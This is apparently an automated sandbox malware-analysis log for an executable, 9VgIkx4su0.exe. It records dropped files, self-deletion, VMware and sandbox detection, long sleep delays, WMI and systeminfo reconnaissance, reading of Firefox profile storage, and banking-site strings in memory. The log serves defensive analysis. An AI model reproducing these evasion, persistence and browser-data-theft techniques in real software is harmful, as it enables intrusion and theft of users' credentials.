                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: 9VgIkx4su0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeUnpacked PE file: 0.2.9VgIkx4su0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\eihchavUnpacked PE file: 4.2.eihchav.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeUnpacked PE file: 6.2.3E40.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\dghchavUnpacked PE file: 7.2.dghchav.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE278EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,8_2_00007FF6DFE278EC
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_0062515F push esp; ret 0_2_00625161
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00623502 push B63524ADh; retn 001Fh0_2_00623539
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00623FFF pushfd ; iretd 0_2_00624000
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_02091540 pushad ; ret 0_2_02091550
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_004031DB push eax; ret 4_2_004032AB
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_005E183A push B63524ADh; retn 001Fh4_2_005E1871
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_005E2337 pushfd ; iretd 4_2_005E2338
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_005E3497 push esp; ret 4_2_005E3499
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_02091540 pushad ; ret 4_2_02091550
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_0040100B push esi; ret 6_2_0040100C
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_0040280E push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_0040281F push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00402822 push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00401328 push edi; retf 6_2_0040132A
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004027ED push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004027FB push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00562854 push esp; ret 6_2_00562A2D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00562875 push esp; ret 6_2_00562A2D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00561072 push esi; ret 6_2_00561073
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00562862 push esp; ret 6_2_00562A2D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00561909 push esp; iretd 6_2_005619BF
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00561386 push edi; retf 6_2_00561391
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00562886 push esp; ret 6_2_00562A2D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00562889 push esp; ret 6_2_00562A2D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_006C0545 push esi; ret 6_2_006C0546
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_006C085C push edi; retf 6_2_006C085D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_006AD83E push eax; retf 006Ah6_2_006AD81D
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_006C1FCA push 9A832F1Fh; iretd 6_2_006C1FD0

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dghchavJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FDDB.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eihchavJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3E40.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dghchavJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eihchavJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\9vgikx4su0.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\eihchav:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dghchav:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\eihchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_15-892
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                  Source: C:\Users\user\AppData\Roaming\eihchavAPI/Special instruction interceptor: Address: 7FF8C88EE814
                  Source: C:\Users\user\AppData\Roaming\eihchavAPI/Special instruction interceptor: Address: 7FF8C88ED584
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                  Source: C:\Users\user\AppData\Roaming\dghchavAPI/Special instruction interceptor: Address: 7FF8C88EE814
                  Source: C:\Users\user\AppData\Roaming\dghchavAPI/Special instruction interceptor: Address: 7FF8C88ED584
                  Source: 9VgIkx4su0.exe, 00000000.00000002.2114577887.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,15_2_00191016
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_006AD884 sldt word ptr [eax]6_2_006AD884
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 455Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2583Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 798Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 595Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 858Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2812
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2054
                  Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4097
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4227
                  Source: C:\Users\user\AppData\Roaming\dghchavEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Roaming\eihchavEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.8 %
                  Source: C:\Users\user\AppData\Roaming\dghchavAPI coverage: 6.8 %
                  Source: C:\Users\user\AppData\Roaming\eihchavAPI coverage: 6.8 %
                  Source: C:\Windows\explorer.exe TID: 6532Thread sleep count: 455 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 984Thread sleep count: 2583 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 984Thread sleep time: -258300s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 4760Thread sleep count: 798 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 4760Thread sleep time: -79800s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 2300Thread sleep count: 303 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 1216Thread sleep count: 325 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 1216Thread sleep time: -32500s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 3116Thread sleep count: 331 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3116Thread sleep time: -33100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 984Thread sleep count: 595 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 984Thread sleep time: -59500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 3440Thread sleep count: 2812 > 30
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 3440Thread sleep time: -2812000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 4568Thread sleep count: 2054 > 30
                  Source: C:\Windows\explorer.exe TID: 4568Thread sleep time: -2054000s >= -30000s
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 6056Thread sleep count: 4097 > 30
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 6056Thread sleep time: -4097000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 5980Thread sleep count: 4227 > 30
                  Source: C:\Windows\explorer.exe TID: 5980Thread sleep time: -4227000s >= -30000s
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,8_2_00007FF6DFE2FB4C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,10_2_006E2B15
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,10_2_006E1D4A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,10_2_006E3ED9
                  Source: C:\Windows\explorer.exeCode function: 13_2_00CB30A8 FindFirstFileW,FindNextFileW,FindClose,13_2_00CB30A8
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_004010E0 GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,38_2_004010E0
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E6512 GetSystemInfo,10_2_006E6512
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\Jump to behavior
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: B126.tmp.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: B126.tmp.10.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003052000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: B126.tmp.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: B126.tmp.10.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: B126.tmp.10.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: B126.tmp.10.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: B126.tmp.10.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: B126.tmp.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: B126.tmp.10.drBinary or memory string: bankofamerica.comVMware20,11696428655x
